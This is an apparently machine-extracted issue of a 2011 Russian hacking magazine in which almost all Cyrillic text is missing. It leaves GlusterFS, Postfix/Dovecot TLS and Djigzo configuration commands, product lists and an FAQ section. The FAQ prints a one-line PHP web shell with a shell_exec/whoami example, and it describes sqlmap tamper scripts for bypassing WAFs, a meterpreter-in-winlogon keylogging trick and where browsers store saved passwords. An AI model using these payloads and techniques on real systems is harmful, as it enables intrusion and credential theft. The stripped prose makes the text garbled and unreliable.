192.168.0.1:/data 192.168.0.2:/data 192.168.0.3:/data
192.168.0.4:/data
Volume Name: new_volume
Type: Distribute
Status: Created
Number of Bricks: 4
Transport-type: tcp
Bricks:
Brick1: 192.168.0.1:/data
Brick2: 192.168.0.2:/data

11 /154/ 2011

, . , , :
,
.. .
Distributed Replicated RAID10:
# gluster volume create new_volume replica 2 transport
tcp 192.168.0.1:/data 192.168.0.2:/data 192.168.0.3:/data
192.168.0.4:/data
( , )
. , ( )
GlusterFS
,
RAID.
, , , ( ,
). :
# gluster volume set new_volume auth.allow 192.168.0.*
GlusterFS

Brick3: 192.168.0.3:/data
Brick4: 192.168.0.4:/data
, ,
/
data .
Replicated , RAID1. ,
. :
# gluster volume create new_volume replica 2 transport
tcp 192.168.0.1:/data 192.168.0.2:/data
,
( ), /data.

, ,
, :
# gluster volume start new_volume
Starting volume new_volume has been successful


GlusterFS : glusterfs-, GlusterFS, NFS-, , CIFS,
Windows. ,
:
# mkdir /mnt/new_volume
# mount -t glusterfs 192.168.0.1:/new_volume \
/mnt/new_volume
new_volume /mnt/new_
volume.

Striped
, RAID1. Distributed,
, , ,
/ . :
# gluster volume create new_volume stripe 2 transport tcp
192.168.0.1:/data 192.168.0.2:/data

Distributed Striped-.
( 2 stripe
) ,
:
# gluster volume create new_volume stripe 2 transport tcp
192.168.0.1:/data 192.168.0.2:/data 192.168.0.3:/data
192.168.0.4:/data

11 /154/ 2011

127

SYN/ACK
, - (volfile),
.
, , , ( GlusterFS
, ,
).
,
/etc/fstab :
192.168.0.1:/new_volume glusterfs defaults,_netdev 0 0
,
FUSE (, Solaris OpenBSD), NFS- ( TCP):
# mount -o mountproto=tcp -t nfs 192.168.0.1:/new_volume
/mnt/new_volume

3. :

/etc/fstab:
192.168.0.1:/new_volume /mnt/new_volume nfs defaults,
_netdev,mountproto=tcp 0 0
GlusterFS-
Windows,
Samba-,
CIFS. ,
samba GlusterFS-
( ), glusterfs-, /etc/samba/smb.conf
:
[gluster]
comment = Gluster volume
path = /mnt/new_volume
read only = no
guest ok = yes
samba:
# /etc/init.d/samba restart
Windows.

,

, GlusterFS-
: ,
, .. ?
: ,
. ,
, :
1.
gluster peer probe:

# gluster volume rebalance new_volume start


Starting rebalance on volume new_volume has been successful

( ), :
1. :
# gluster peer probe 192.168.0.5
# gluster volume add-brick new_volume 192.168.0.5:/data
2. ( 192.168.0.3
192.168.0.5):
# gluster volume replace-brick new_volume \
192.168.0.3:/data 192.168.0.5:/data start
Replace brick start operation successful
3. :
# gluster volume replace-brick new_volume \
192.168.0.3:/data 192.168.0.5:/data start
replace-brick commit successful
4. :
# gluster volume remove-brick test-volume \
192.168.0.3:/data
Removing brick(s) can result in data loss. Do you want
to Continue? (y/n)
Enter "y" to confirm the operation. The command displays
the following:
Remove Brick successful
5. :
# gluster peer detach 192.168.0.3

# gluster peer probe 192.168.0.5


Probe successful
2. ( ):
# gluster volume add-brick new_volume 192.168.0.5:/data
Add Brick successful

128

, 5 ,
,
- .
, -
-. z

11 /154/ 2011

aka 13oz

. ,
152 , //
, 58- .

,

, , .

,
, , . , ().

, , , ,
.
ISPDN.RU,
.
,
.
, :
1. ;
2. ;
3. ;
4. ;
5.
;
6. ( ).

, .
? ( ),
( ) -

11 /154/ 2011

129

SYN/ACK



-,
,
www.gosuslugi.ru.
,
.
,
.

58-

. (,
), ?
. , (, ,
, , ,
). ,

, .
,
.


.
,
( , ), . , ,
, ,
, .
.

. ,
, .
,
, .

, :).
, - . ,
, . ?
. /
. ,

, , , .

. .


58-
. .
, , ,
( 10 ) , ,
.



.
. : 3, 2,
1.
. . . 4, ,
3,
2, ( www.wikisec.
ru ) 1.
- , . ,
, . ,
.

, -

130

Stonegate Firewall

11 /154/ 2011

MAC


ARP
IP


, .
-
. !
,
.

eth0

eth1

IPX

,
( - )

m
DMZ

-2

-2

-2



Windows Unix



(SPmon)

-2 ( npo-rtc.ru)


1. ;
2.
;
3. ;
4. ;
5. ;
6. ;
7. ;
8.
;
9.
;
10.
;
11. ;
12.
;
13. , ;
14. ,
,
;
15. ;
16. ;
17.
;
18.
.

11 /154/ 2011

, , (
)

.

- , ... .
, 152- ,

.
,
,
. ,
,
( ).
.

- .

?
, , .
.
.

. -
, , , . :
1. ...
,
;
2. , . :

. ,
. ;
3. ,
,
. .
, .
, ,
, .
, ,

131

SYN/ACK
( ),
(), VPN.
,
,

1 . ( ) 1.
,
, , .


,
.
:
1. ( )
2.
3. ( VPN-).
? , ( ),
.
.
:
1. Dallas Lock;
2. NT;
3. Secret Net;
4. Windows 7.
,
, . Dallas Lock
, - AD. .
NT ,
AD .
Secret Net (, ) .
,
,
,
,

.
?
,
:). , ,
- .

, , .
:
1. -2;
2. ;
3. VipNet (Personal Firewall Office Firewall, VipNet Client);
4. Trust Access;
5. Stonegate Firewall/VPN.
, . ,
. ,

, ,
.
-

132

( )

VipNet Custom ( )


, ,
,
.
,
,
,
.

11 /154/ 2011

. VipNet VipNet Client


VPN- VipNet Custom,
VPN, . , , ,
Trust Access .
? VipNet
VipNet Personal Firewall,
, VipNet Office Firewall,
. .
, . ,
. . Trust Access , -,
, , Kerberos.
, , , ,
.


-2 , FreeBSD. ,
, . .
, IP- ,
. ,
, -,
.

- ,
. , VPN, .
FreeBSD .
. .

3. VPN,
.
Stonegate Firewall/VPN ,
, , . ,
,
.
,
,
. ,
.

Cisco, PIX Firewall .
.
, , .
VPN:
-PRO . -


, ,
,

11 /154/ 2011

,

?
.
, . ,
,
, 1

.
, , Safe-Line.
VPN-:
1. VipNet Custom;
2. .
,
VipNet Custom. , . :
VipNet Coordinator ( Windows Linux),
VipNet Client (Windows only) ( Windows). : ,
, ,
.
, . ,
. (
, :)) ,
. !
VipNet-.
,
, .
, , .
,
, , VPN-,
, .
, , ,
.


, ,
.
, (. ).
, ,
: ?
,
.
. 9, 3 3
(), 2 (
), 1 (
). , , ,
1: , 1
1, ,
( ,
). , , 1 8
,
. . z

133

SYN/ACK
grinder (grinder@tux.in.ua)

- ,
,
. . ,
.
,
. ,
.
?

134

INFO

WWW

,
Postfix
TLS,
,
ldd /usr/libexec/
postfix/smtpd

.
libssl,

.

Postfix
postfix.org/
postconf.5.html
C Dovecot dovecot.org
Djigzo
djigzo.com

,
ARPANET, .
, ,
. , ,
. ,
, .
,
,
(pass-the-hash).
.
.

PGP/GPG S/MIME.
,
Enigmail, FireGPG, APG (Android Privacy Guard)
. : ,
, .
: ,
. : ,
. ,

.
, , .
SMTP/POP3/IMAP
. ,
.
.
VPN .
, .

11 /154/ 2011

Postfix Ubuntu TLS

Djigzo

OpenSource- Djigzo (djigzo.


com) , DLP (Data Leak Prevention). ,
,
.

, . ,
TLS, ,
, . :

TLS POSTFIX

TLS (Transport Layer Security), ,
,
. ,

. Postfix,
, Exim, Sendmail
.
TLS : Postfix SSL,
TLS main.cf. , Postfix
TLS ( ) , "ldd /
usr/sbin/postfix" .
libssl, .
Ubuntu, .
TLS
postfix-tls.
:
$ sudo aptitude install postfix
() . ,
sudo dpkg-reconfigure postfix : ,
( root postmaster), ,
, , ,
. . ,

/etc/postfix/main.cf postconf -e,
.\
:
( /
etc/ssl). ,
, ,
Postfix /etc/ssl/openssl.
cnf. .
, ,
, .
Postfix main.cf ,

11 /154/ 2011

$ sudo nano /etc/postfix/main.cf


# TLS parameters
#
smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert.pem
smtpd_tls_key_file=/etc/ssl/private/ssl-cert.key
# TLS
smtpd_use_tls=yes
#
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
# , ,
TLS
# smtpd_tls_auth_only = yes
#
# may,
encrypt
smtp_tls_security_level = may
smtpd_tls_security_level = may
#
smtp_tls_note_starttls_offer = yes
smtpd_tls_loglevel = 1
#
# smtpd_tls_received_header = yes
smtpd_tls_session_cache_timeout = 3600s
#tls_random_source = dev:/dev/urandom
,
, smtpd_banner. ,
, . :
$ sudo service postfix restart
25- .
$ telnet localhost 25
ehlo localhost
, 250-STARTTLS. ,
TLS . SASL . ,
, tcpdump.
, : Postfix
25- , TLS.

135

SYN/ACK

Dovecot

netstat ,

, .
SMTPS-
( 465). , (,
), SMTP
. : /etc/postix/
master.cf :

# }
# protocol pop3 {
# listen = *:10100
# ..
# }
# , "" required
ssl = yes
#
ssl_cert_file = /etc/ssl/certs/dovecot.pem
ssl_key_file = /etc/ssl/private/dovecot.pem
# ,
#ssl_key_password =
#
#ssl_ca_file =
#
#ssl_verify_client_cert = yes
#ssl_cert_username_field = commonName
#ssl_parameters_regenerate = 168
#ssl_cipher_list = ALL:!LOW:!SSLv2
#
#verbose_ssl = yes

$ sudo nano /etc/postix/master.cf


smtps inet n - - - - smtpd
-o smtpd_tls_wrappermode=yes
# -o smtpd_sasl_auth_enable=yes
# -o smtpd_client_restrictions=permit_sasl_
authenticated,reject
, 25-, 465- .
, , .

DOVECOT
-,
POP3 IMAP, Dovecot (dovecot.org),
Courier (courier-mta.org) Cyrus (cyrusimap.org).
(POP3S IMAPS),

.
Dovecot. ( , Ubuntu dovecotpostfix, ):
$ sudo aptitude install dovecot-pop3d dovecot-imapd
, .
, netstat ,
.
, , ,
. :
$ sudo nano /etc/dovecot/dovecot.conf
listen = *
protocols = pop3 pop3s imap imaps
#
# protocol imap {
# listen = *:10143
# ssl_listen = *:10943
# ..

136

:
$ sudo service dovecot restart
netstat , 110/995 (POP3/S) 143/993 (IMAP/S). ,
tcpdump. , , (SquirrelMail, RoundCube, Open
WebMail ), HTTPS.

DJIGZO
, ,
.
- .
OpenSource- Djigzo Email Encryption Gateway, DLP (Data Leak Prevention) .
, ,
.
*nix , Java 6
Postfix. Ubuntu/Debian, RedHat/CentOS,
VMware, Hyper-V.

11 /154/ 2011

Deb- Djigzo

Djigzo

, S/MIME. PDF
.
(
SMS).
(EJBCA, Microsoft CA)
Verisign Comodo. ,
. Djigzo
, , .
DKIM (DomainKeys Identified Mail).
BlackBerry Android,
Djigzo S/MIME
.
-. : Djigzo ,
( ).
, ,
Ubuntu/Debian, .
deb- rpm- :

, Postfix, 10025-
, Djigzo. ,
Postfix
,
. , Djigzo , , . Tomcat,
:
$ sudo nano /etc/default/tomcat6
JAVA_OPTS="$JAVA_OPTS -Ddjigzo-web.home=/usr/share/djigzo-web"
JAVA_OPTS="$JAVA_OPTS -Djava.awt.headless=true -Xmx256M"
TOMCAT6_SECURITY=no
, :
$ sudo chown tomcat6:djigzo /usr/share/djigzo-web/ssl/
sslCertificate.p12
, HTTPS- Tomcat:

$ sudo apt-get install postgresql postfix openjdk-6-jre


openjdk-6-jre-headless tzdata-java ant ant-optional
mktemp wget libsasl2-modules tomcat6
$ wget -c http://djigzo.com/downloads/djigzo-release-2
.1.1-1/djigzo_2.1.1-1_all.deb
$ wget -c http://djigzo.com/downloads/djigzo-release-2
.1.1-1/djigzo-web_2.1.1-1_all.deb
$ sudo dpkg -i ./djigzo_2.1.1-1_all.deb ./dpkg -i \
djigzo-web_2.1.1-1_all.deb
$ sudo apt-get -f install

$ sudo cp /usr/share/djigzo-web/conf/tomcat/server-T6.xml \
/etc/tomcat6/server.xml

, .
, ,
/etc/sudoers. /etc/postfix , :

$ sudo service tomcat6 restart

$ cd /etc/postfix
$ sudo mv djigzo-main.cf main.cf
$ sudo mv djigzo-master.cf master.cf
Djigzo Postfix, . :
$ cat cat /etc/postfix/main.cf
content_filter = djigzo:127.0.0.1:10025

11 /154/ 2011

Djigzo:
$ sudo nano /etc/tomcat6/Catalina/localhost/djigzo.xml
<Context docBase="/usr/share/djigzo-web/djigzo.war"
unpackWAR="false"/>
:

https://localhost:8443/djigzo, , admin, admin.


- Djigzo . , ( Djigzo:
), , (CRL),
.

: ,
.
. z

137

UNITS / FAQ UNITED

FAQ United

FAQ@REAL.XAKEP.RU

. ,

:
MYSQL, ,
NOSQL, .

.
:).

, ,

.
, ,
.
, , ,

. Sphinx
(sphinxsearch.com). ,
. ,
,

Craigslist.org.
, .
: 200 000 000
! 2 000 .
Sphinx
.

. SphinxAPI
.
SphinxQL,
SQL.
,

,
(
):

(10-15 );
( ( 1.2 ) 500+
2 ).
Sphinx
SQL , NoSQL . , !


PHP-,

EVAL()?

,
(h.ackack.net/tiny-php-shell.


$_. ,

PHP-,
copypaste.php?1=shell_exec&2=whoami, shell_exec,

whoami.

Q
A

64-
32- (X86)?
execute:

execute H c f
"C:\\WINDOWS\\Sysnative\\notepad.exe"
,
(
notepad.exe), 32- , 64- .
.

html):
<?=($_=@$_GET[2]).@$_($_GET[1])?>
, PHP . , :
1. $_=@$_GET[2]
2. @$_($_GET[1])
. GET- 2
$_.
GET- 1,

. ,

WAF/IDF. ,

?
,
: PHPIDS
(phpids.org) ModSecurity (www.modsecurity.
org). ,

( sqlmap')
WAF.

, ,

5 : METASPLOIT

Metasploit,

.
,
Ophcrack (ophcrack.sourceforge.net).
?
?

138

,
.
Metasploit Framework
.
,
meterpreter keyscan_dump,
, .

,
<LWin>
<L>, ,
,
. , . ,
, , , ,
, !

11 /154/ 2011

FAQ UNITED

. ,
WAF. 0day-
- .
ModSecurity ,

, ,
. :
,
( ,

),
WAF.

MALWARE- ANDROID

Q
A

, ANDROID ?

Android .
, , ,
, .
. ,
,
.
1. , Android dex- Java
class, Dex2jar (code.google.com/p/dex2jar). dex- apk, ,
.
2. jar-, Java JD-GUI (java.decompiler.free.fr).
sendTextMessage(), . , , SMS.

( MCC, Mobile Country Code).
, ,
.
Android,
.


WAF?

WAF
,
- .
.
sqlmap,
tampering-.
, randomcomments.py
inline-,
SQL (, SELECT
SEL/**/E/**/CT). , (
SELECT ..).
unmagicquotes.py
magic_quotes
(, 1' AND =1 1%bf%27
AND 1=1--%20).
versionedkey words.py
WAF/IDF (UNION ALL SELECT
*!UNION*//*!ALL*//*!SELECT*/).
( sqlmap 24)
,
, WAF.

BACKTRACK,
HACK?

, ,
,
update:

/usr/bin/apt-get -y update
/usr/bin/apt-get -y upgrade
JD-GUI .JAVA-,
.

winlogon (
)
.
, ,

. . , meterpreter
winlogon.

11 /154/ 2011

, ,

.

.
meterpreter winlogon,
.

,
Lockout_Keylogger,
.
,
( )
.
,
.

139

UNITS / FAQ UNITED

2.
Root', (/
etc/ssh/sshd_config) :
PermitRootLogin no.
3. ,
SSH, .

AllowUsers <username>. wildcard'
(* ?). ,
- :
AllowGroups <groups>.
4. -
. -
Port-knocking,
SSH-
5. ,
IP ( hosts.allow)

.
Selenium IDE

apt-get dist-upgrade
, :
apt-get update && apt-get dist-upgrade -y
. security-
:
/pentest/exploits/fast-track.py -i


-?

,

- , Selenium (seleniumhq.
org).
,

,
Yac.

,
.
Selenium IDE
Firefox, .
,
,
.

SSH
?

1.
private-public .

, ..

140

, (WINDOWS
7) -
- .

,
. -
?


AntiFreeze (resplendence.com/antifreeze_
os). -,
, ,
.
,
,
, -
.
,
. , AntiFreeze

ALT+CTRL+WIN+HOME.


SQL, SQLMAP,
?

(
Acunetix WVS, www.acunetix.com).
, :
Sqlninja (sqlninja.sourceforge.net);
Pangolin 3.2.3 free edition (www.nosec.org/en/
pangolin_download.html);
Havij v1.14 Advanced SQL Injection (itsecteam.
com/en/projects/project1.htm);
SQL Power Injector (www.sqlpowerinjector.com);
SQLIer 0.8.2b (bcable.net/releases.php?sqlier);
bsqlbf-v2 (code.google.com/p/bsqlbf-v2);
SCRT Mini-MySqlat0r (www.scrt.ch/attaque/
telechargements/mini-mysqlat0r);
Safe3 Sql Injector (sourceforge.net/projects/
safe3si);

Marathon Tool (www.codeplex.com/


marathontool);
Absinthe (www.0x90.org/releases/absinthe);
pysqlin (code.google.com/p/pysqlin);
WITOOL (witool.sourceforge.net);
sqlus (sqlsus.sourceforge.net);
Toolza (bit.ly/rihToZ).
...

Firefox
Sqlite,
signons.sqlite.
Triple-DES BASE64.

,
:

[Windows XP]
C:\Documents and Settings\<user_name>\
Application Data\Mozilla\Firefox\
Profiles\<random_name>.default
[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\
Mozilla\Firefox\Profiles\<random_name>.
default
Google Chrome, Firefox, sqlite Login Data,
:
[Windows XP]
C:\Documents and Settings\<user_name>\
Local Settings\Application Data\Google\
Chrome\User Data\Default
[Windows Vista & Windows 7]
C:\Users\<user_name>\Appdata\Local\
Google\Chrome\User Data\Default
Opera
. Wand.dat :
C:\Documents and Settings\<username>\
Application Data\Opera\Opera\wand.dat
[Windows Vista/Windows 7]
C:\users\<username>\AppData\Roaming\
Opera\Opera\wand.dat
Internet Explorer
URL :
HKEY_CURRENT_USER\Software\
Microsoft\Internet Explorer\
IntelliForms\Storage2

FirePasswordViewer, FirePassword, Chrome
PasswordDecryptor, OperaPasswordDecryptor,
IEPasswordDecryptor. securityxploded.com. z

11 /154/ 2011

>Security
0x4553-Intercepter 0.84
Angry IP Scanner 3.0. beta
AxCrypt 1.7
cudadbcracker
DDOS Tracer 1.0
FBPwn 0.1.6
Fpipe 2.1
knock 1.5
ModSecurity 2.6.2
NetworkMiner 1.1
Ophcrack 3.3.1
Process Hacker 2.22
ProcHeapViewer 3.5
Registry Decoder
Remove Fake Antivirus 1.80

>Net
AirDC++ 2.20
AppSnap 1.3.3
BTProximity
Dropf
Elite Proxy Switcher 1.16
FileHippo Update Checker 1.038
Fresh FTP 5.45
NameBench 1.3.1
Network Activity Indicator 0.9.0
QckTwit 0.9.5.1
Remote Desktop Manager 6.5.1.0
RusRoute 1.8.2
TapinRadio 1.0
WinSCP 4.3.5
Wireless Network Watcher 1.31
Witty 2.0.4

>Multimedia
DVDFab Passkey Lite 8.0.3.9
EPNamer 2.0.0
Free Screen To Video 2.0.0.0
MakeMKV 1.6.15
Personal Activity Monitor 0.1.4
PhotoBooth
PhotoFilmStrip 1.4.4
ProgDVB 6.72.1
Screenshot Captor 2.102.01
STDUViewer 1.6.62
UMPlayer 0.98

>Games
Secret Maryo Chronicles 1.9

>>WINDOWS
>Development
Android SDK R13
Dev-C++ 4.9.9.2
Eclipse 3.7.1
Eclipse PDT 2.2.0
IETester 0.4.11
ILMerge 2.11.0923
PSPad 4.5.4
Qt Creator 2.3.1
SharpDevelop 4.1
SqlDbx 3.51
TLS Lite 0.3.8
TortoiseSVN 1.6.16
WampServer 2.2a
XAMPP 1.7.4

>>MAC
Changes Meter 1.7.7
eMaps 2.3.6
Funter 1.0.0
Get Tube 5.0
Google Books Downloader 1.0
InerziaMode 1.4
iPlayer+ 2.0.2
LotsaSnow 1.5
MacPorts 2.0.3
Moroshka File Manager 1.0.54
MPlayerX 1.0.9
Scroll Reverser 1.4.4
SyncTwoFolders 1.7.6b1
Syrinx 2.4.7
TCPBlock 2.9
Teleport 1.1
Tincta 1.1
Wunderlist 1.2.4
Wyse PocketCloud 2.0.7s
X Lossless Decoder 20110924

>System
Console 2.00
CPU-Z 1.58
Double Commander 0.5.0
Driver Sweeper 3.2.0
DriverBackup 2.1
DVD Flick 1.3.0.7
Fast Folder Eraser
PC Usage Viewer 1.0
RAM CPU Taskbar 1.6.2
SARDU 2.0.3
SyncToy 2.1
UltraDefrag 5.0.0 beta3
UNetbootin 5.55
WinDirStat 1.1.2
WinDjView 1.0.3
WinMerge 2.12.4

>Misc
AutoClipX 1.9.0.0
ControlPad 0.72
Feewhee 1.3
Free Countdown Timer 2.3
Free Studio 5.2.1
GymNotes 1.3.1.740
Handy Shortcuts
MapKeyboard 1.2
Menu Uninstaller 1.2.3
MouseFighter 5.6
Rainbow Folders 2.05
Smart UAC
Touchpad Blocker 1.5
USBFlashSpeed
USBGrab
Volume2 1.1.1

soapUI 4.0.1
SUPERAntiSpyware 5.0.1128
USB Dummy Protect 1.1
USB Hidden Folder Fix 1.1
VISDA
wavsep 1.0.3
WipeFile 2.1.1
XCat

>Security
Dacs 1.4.26

>Net
Aria2 1.12.1
CheckGmail 1.13
EiskaltDCPP 2.2.4
Empathy 3.2.0
Esniper 2.26.0
Filezilla 3.5.1
Firefox 7.0.1
Frostwire 5.1.5
Midori 0.4.0
Minitube 1.5
Mumble 1.2.3
Opera 11.51
Pidgin 2.10.0
Rtorrent 0.8.9
Ssvnc 1.0.29
Thunderbird 7.0.1
Turpial 1.5.0
WebHttrack 3.44.1

>Games
AssaultCube 1.1.0.4
Hedgewars 0.9.16
OpenClonk 5.2.0

>Devel
Aptana 3.0.5
Boost 1.47.0
ClanLib 2.3.3
Clojure 1.3.0
Clutter 1.8.0
dhtmlxGantt 1.3
GMP 5.0.2
GTK+ 3.2.0
jQuery 1.6.4
Juce 1.5.3
Maatkit 7540
MantisBT 1.2.8
MonoDevelop 2.6
QtCreator 2.3.1
Rails 3.1
Shogun 1.0.0

>>UNIX
>Desktop
AfterStep 2.2.11
aTunes 2.1.0
BombonoDVD 1.0.2
Deja-Dup 20.0
Diffuse 0.4.4
ffDiaporama 1.0.0
GNOME 3.2
GnoMenu 2.9.1
Gobby 0.4.94
Granola 4.0.1
Grsync 1.2.0
HomeBank 4.4
Interceptor 1.2.9
Kile 2.1
LibreOffice 3.4.3
Rodent 4.7.2
Subsonic 4.5
Terminator 0.96
WatchVideo 2.2.1

>X-distr
Calculate Linux 11.9
FreeNAS 8.0.1
Linux Mint 11

>System
AMD Catalyst OpenGL 8.88.8
BleachBit 0.9.0
Bootchart 0.9
Clonezilla 1.2.10-14
Computer-janitor 2.1.0
Coreutils 8.13
LimitCPU 1.4
Linux Kernel 3.0.4
Nut 2.6.2
Nvidia 285.05.09
OpenNebula 3.0.0
Parcellite 1.0.2rc5
PulseAudio 1.0
Q4Wine 0.121
Systemd 36
TruPax 4
VirtualBox 4.1.4

>Server
Apache 2.2.21
Asterisk 1.6.2.20
BIND 9.8.1
CUPS 1.5.0
DHCP 4.2.2
Dovecot 2.0.15
Freeradius 2.1.12
Lighttpd 1.4.29
MiniDLNA 1.0.22
MySQL 5.5.16
Nsd 3.2.8
OpenLDAP 2.4.26
OpenVPN 2.2.1
Postfix 2.8.5
PostgreSQL 9.0.5
Samba 3.6.0
Sendmail 8.14.5
Snort 2.9.1
Squid 3.1.15
Syslog-ng 3.3.1
Vsftpd 2.3.4

FBPwn 0.1.6
Inguma 0.4
knock 1.5
Lsat 0.9.7.1
Lutz 0.8.1
Malheur 0.5.2
ModSecurity 2.6.2
netsniff-ng 0.5.6
Packetfence 3.0.1
pfSense 2.0
Sam 0.6.0
SAMHAIN 2.8.6
soapUI 4.0.1
Sshguard 1.5
Stunnel 4.44
THC-HYDRA v7.1
tsakwaf 0.9.1
wavsep 1.0.3
XCat
Zoneminder 1.25.0

11(154) 2011


!
800
!

191
2200 . ( )
23% ,
(250 )
30 ,
31 ,
31 .

8.5
DVD

!
!
,
, :


+ DVD

Total Football
+ DVD

DVD
+ DVD

DVDXpert

+ DVD

Smoke


,

.
PC
+ 2 DVD

+ DVD

T3

Digital Photo
+ DVD

+ DVD

12 2200 .
6 1260 .
,
!

.
: 210

GOOGLE CHROME 030

x 09 (152) 2011

LULZSEC
09 (152) 2011

082

LULZSEC / FOX NEWS

1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .

500 .



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS



+ + 2 DVD:
162
( 35% , )

!
,
.

12 3890 (24 )
6 2205 (12 )

.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (


, , ).

UNITS /

Dropbox


Dropbox,

092

20 , BUSINESS INSIDER

25 000 000
300 000 000

2008

2009

10

2010


Dropbox

5 ,
14

144


Dropbox


2011

2011

20%

69 Dropbox

35

Python

32.7
6.7
6.5
4.7
4.0
3.5
3.2
2.8

$1 149

35%

, . .

$4 000 000 000

25

Amazon EC2+S3:


Dropbox

2010 Dropbox

$300 000 000

7 Dropbox
.

$100 000 000

100 000 000 000

0,1

$7 200 000

Dropbox

iPhone
iPad
Android
BlackBerry

+400



Python


90%

66,1%

7,4%

20,9%

2,6%

2,0%

0,3%
11 /154/ 2011

>> coding

CODING
ALEKSANDR-EHKKERT@RAMBLER.RU